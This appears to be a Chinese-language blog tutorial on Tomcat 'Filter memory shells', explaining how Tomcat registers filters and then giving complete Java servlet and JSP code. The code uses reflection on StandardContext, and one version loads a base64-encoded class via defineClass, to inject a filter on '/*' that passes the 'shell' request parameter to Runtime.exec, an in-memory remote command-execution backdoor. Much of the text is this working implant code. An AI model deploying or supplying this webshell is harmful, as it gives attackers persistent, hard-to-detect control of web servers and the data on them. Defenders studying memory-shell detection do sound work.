tomcat Filter内存马

idea调试的时候加入源代码

<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <version>8.5.81</version>
    <scope>provided</scope>
</dependency>

Servlet、Listener、Filter 由 javax.servlet.ServletContext 去加载，无论是使用 xml 配置文件还是使用 Annotation 注解配置，均由 Web 容器进行初始化，读取其中的配置属性，然后向容器中进行注册。

Servlet 3.0 API 允许使 ServletContext 用动态进行注册，在 Web 容器初始化的时候（即建立ServletContext 对象的时候）进行动态注册。可以看到 ServletContext 提供了 add/create 方法来实现动态注册的功能。

ServletContext

它会为每个web程序都创建一个对应的ServletContext对象，它代表当前的web应用。 事实上SpringMVC封装的ApplicationContext 以及Struts2封装的ApplicationContext里面都是保存着原本的ServletContext。

作用：

• Web应用范围内存取共享数据；
• 访问web应用的静态资源；
• Servlet对象之间通过ServletContext对象来实现通讯。

ServletContext跟StandardContext的关系

1. StandardContext：

   • StandardContext是Tomcat服务器中的一个组件，用于管理Web应用程序的上下文（Context）。
   • 它是javax.servlet.ServletContext接口的实现类，提供了一些额外的功能和管理能力。
   • StandardContext负责加载和初始化Web应用程序的配置信息，包括Servlet、Filter、Listener等组件的注册和管理。
   • 它还提供了对Web应用程序的生命周期管理，例如启动、停止和重新加载等操作。

2. ServletContext：

   • ServletContext是Java Servlet规范中的一个接口，表示Web应用程序的上下文。
   • 每个Web应用程序都有一个唯一的ServletContext实例，用于在应用程序内共享信息和资源。
   • ServletContext提供了一些方法，用于获取Web应用程序的初始化参数、访问应用程序范围的属性、读取Web应用程序的配置信息等。
   • 它还提供了一些与Web容器交互的方法，例如获取请求调度器、获取资源的真实路径等。

总结：

StandardContext是Tomcat服务器中用于管理Web应用程序的上下文的实现类，而ServletContext是Java Servlet规范中定义的用于表示Web应用程序上下文的接口。它们的主要区别在于StandardContext提供了更多的管理和生命周期控制功能，而ServletContext则提供了访问应用程序范围的属性和配置信息的方法。

Tomcat 中有 4 类容器组件，从上至下依次是：

• Engine，实现类为 org.apache.catalina.core.StandardEngine
• Host，实现类为 org.apache.catalina.core.StandardHost
• Context，实现类为 org.apache.catalina.core.StandardContext
• Wrapper，实现类为 org.apache.catalina.core.StandardWrapper

Filter 内存马

Filter 我们称之为过滤器，是 Java 中最常见也最实用的技术之一，通常被用来处理静态 web 资源、访问权限控制、记录日志等附加功能等等。一次请求进入到服务器后，将先由 Filter 对用户请求进行预处理，再交给 Servlet。

通常情况下，Filter 配置在配置文件和注解中，在其他代码中如果想要完成注册，主要有以下几种方式：

1. 使用 ServletContext 的 addFilter/createFilter 方法注册；
2. 使用 ServletContextListener 的 contextInitialized 方法在服务器启动时注册（将会在 Listener 中进行描述）；
3. 使用 ServletContainerInitializer 的 onStartup 方法在初始化时注册（非动态，后面会描述）。

追溯Filter的doFilter：

1. FilterDemo重写了doFilter，如何执行到FilterDemo的doFilter？

2. ApplicationFilterChain的doFilter被执行，执行了internalDoFilter；

3. filters[]是存放ApplicationFilterConfig的地方，包含filterDef和fitler对象，取出每个元组，赋值给filterConfig；

   Filter filter = filterConfig.getFilter();

4. 然后执行了filter.doFilter(request, response, this);

5. filters[]是在哪里赋值的呢？

6. 在StandardWrapperValve的invoke中

   ApplicationFilterChain filterChain =
   
   ApplicationFilterFactory.createFilterChain(request, wrapper, servlet);然后执行了filterChain.doFilter。

   看看createFilterChain里面做了什么？

7. 在ApplicationFilterFactory的createFilterChain中

   ApplicationFilterChain filterChain = null;

   StandardContext context = (StandardContext) wrapper.getParent();

   FilterMap filterMaps[] = context.findFilterMaps();从StandardContext配置文件中获取filter，放入filterMaps

   这里是根据前面获取的filterMaps循环来获取的

   for (FilterMap filterMap : filterMaps)
   ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)
                       context.findFilterConfig(filterMap.getFilterName());
   filterChain.addFilter(filterConfig);
   

8. filterChain.addFilter(filterConfig)，最后return filterChain。

9. 在ApplicationFilterChain的addFilter中做了什么？filters[n++] = filterConfig;所以最终filters[]里面会有所有filter的filterConfig；

FilterConfigs：存放 filterConfig 的数组，在 FilterConfig 中主要存放 FilterDef 和Filter 对象等信息
FilterDefs：存放 FilterDef 的数组 ，FilterDef 中存储着我们过滤器名，过滤器实例等基本信息
FilterMaps：存放 FilterMap 的数组，在 FilterMap 中主要存放了 FilterName 和 对应的 URLPattern

fiterConfig的内容都是从context中得到，因此只要我们能控制context的内容就行了

动态注册Filter

经过上面的分析，我们可以总结出动态注册Filter的流程：

1. 获取上下文对象StandardContext
2. 创建恶意Filter
3. 构造FilterDef封装filter
4. 创建filterMap，将路径与Filtername绑定，将其添加到filterMaps中
5. 使用FilterConfig封装filterDef，然后将其添加到filterConfigs中

package com.example.webshellfilter;

import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationContextFacade;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import sun.misc.BASE64Decoder;

import javax.servlet.Filter;
import javax.servlet.ServletContext;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

@WebServlet(name = "filterServlet", value = "/filterServlet")
public class FilterServletDemo extends HttpServlet {
    public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
        try {
            //1、通过request获取ServletContext类
            //通过request获取servletContext
            ServletContext servletContext = request.getServletContext();
            //其实这里是ApplicationContextFacade的类
            System.out.println(servletContext.getClass());
            Field applicationContextFacadefield = servletContext.getClass().getDeclaredField("context");
            applicationContextFacadefield.setAccessible(true);
            //获取servletContext对象中的context的值,因为是ApplicationContextFacade所以获取到的context是ApplicationContext
            ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadefield.get(servletContext);
            //通过applicationContext对象获取StandardContext
            Field standardContextfield = applicationContext.getClass().getDeclaredField("context");
            standardContextfield.setAccessible(true);
            StandardContext standardContext = (StandardContext) standardContextfield.get(applicationContext);

            //将Filter对象通过反射实现加载
            ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
            //2、在Java中，可以使用defineClass方法将一个类动态地注入到当前的JVM中，这里将filter类注入进去
            Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            defineClass.setAccessible(true);
            BASE64Decoder base64Decoder = new BASE64Decoder();
            byte[] code = base64Decoder.decodeBuffer("yv66vgAAADQAWg....");
            defineClass.invoke(classLoader,code, 0, code.length);

            //3、添加filterDef
            System.out.println(Class.forName("FilterDemo").getName());
            Filter filterDemo = (Filter) Class.forName("FilterDemo").newInstance();
            FilterDef filterDef = new FilterDef();
            filterDef.setFilter(filterDemo);
            filterDef.setFilterName("FilterDemo");
            standardContext.addFilterDef(filterDef);

            //4、添加filterMap
            FilterMap filterMap = new FilterMap();
            filterMap.setFilterName("FilterDemo");
            filterMap.addURLPattern("/*");
            standardContext.addFilterMap(filterMap);

            //添加到standardContext的filterConfigs中
            //反射获取filterConfigs
            //由于ApplicationFilterConfig经Final修饰，且构造方法为静态方法，无法通过new实例化，需通过反射获取ApplicationFilterConfig构造方法并实例化后添加入filterConfigs
            Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
            filterConfigs.setAccessible(true);
            HashMap hashMap = (HashMap) filterConfigs.get(standardContext);
            Constructor<?> declaredConstructor = ApplicationFilterConfig.class.getDeclaredConstructors()[0];
            declaredConstructor.setAccessible(true);
            hashMap.put("FilterDemo",declaredConstructor.newInstance(standardContext,filterDef));

            PrintWriter out = response.getWriter();
            out.println("over");

        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }
}

jsp实现

<%@ page language="java" %>
<%@ page import="javax.servlet.http.HttpServletRequest" %>
<%@ page import="javax.servlet.http.HttpServletResponse" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="java.io.IOException" %>
<html>
<head>
    <title>Get Request Object in JSP</title>
</head>
<body>
<h1>Get Request Object in JSP</h1>
<%
    class FilterDemo implements Filter {
        @Override
        public void init(FilterConfig filterConfig) throws ServletException {
            System.out.println("初始加完成");
        }

        @Override
        public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
            servletRequest.setCharacterEncoding("utf-8");
            servletResponse.setCharacterEncoding("utf-8");
            servletResponse.setContentType("text/html;charset=UTF-8");
            System.out.println(servletRequest.getParameter("shell"));
            Runtime.getRuntime().exec(servletRequest.getParameter("shell"));
            System.out.println("过滤中。。。");
            filterChain.doFilter(servletRequest,servletResponse);
        }

        @Override
        public void destroy() {
            System.out.println("过滤结束");
        }
    }

    //1、通过request获取ServletContext类
    //通过request获取servletContext
    ServletContext servletContext = request.getServletContext();
    //其实这里是ApplicationContextFacade的类
    System.out.println(servletContext.getClass());
    Field applicationContextFacadefield = servletContext.getClass().getDeclaredField("context");
    applicationContextFacadefield.setAccessible(true);
    //获取servletContext对象中的context的值,因为是ApplicationContextFacade所以获取到的context是ApplicationContext
    ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadefield.get(servletContext);
    //通过applicationContext对象获取StandardContext
    Field standardContextfield = applicationContext.getClass().getDeclaredField("context");
    standardContextfield.setAccessible(true);
    StandardContext standardContext = (StandardContext) standardContextfield.get(applicationContext);

    //3、添加filterDef
    FilterDemo filterDemo = new FilterDemo();
    FilterDef filterDef = new FilterDef();
    filterDef.setFilter(filterDemo);
    filterDef.setFilterName("FilterDemo");
    filterDef.setFilterClass(filterDemo.getClass().getName());
    standardContext.addFilterDef(filterDef);

    //4、添加filterMap
    FilterMap filterMap = new FilterMap();
    filterMap.setFilterName("FilterDemo");
    filterMap.addURLPattern("/*");
    standardContext.addFilterMap(filterMap);

    //添加到standardContext的filterConfigs中
    //反射获取filterConfigs
    //由于ApplicationFilterConfig经Final修饰，且构造方法为静态方法，无法通过new实例化，需通过反射获取ApplicationFilterConfig构造方法并实例化后添加入filterConfigs
    Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
    filterConfigs.setAccessible(true);
    HashMap hashMap = (HashMap) filterConfigs.get(standardContext);
    Constructor<?> declaredConstructor = ApplicationFilterConfig.class.getDeclaredConstructors()[0];
    declaredConstructor.setAccessible(true);
    hashMap.put("FilterDemo",declaredConstructor.newInstance(standardContext,filterDef));

    System.out.println("over");

%>
</body>
</html>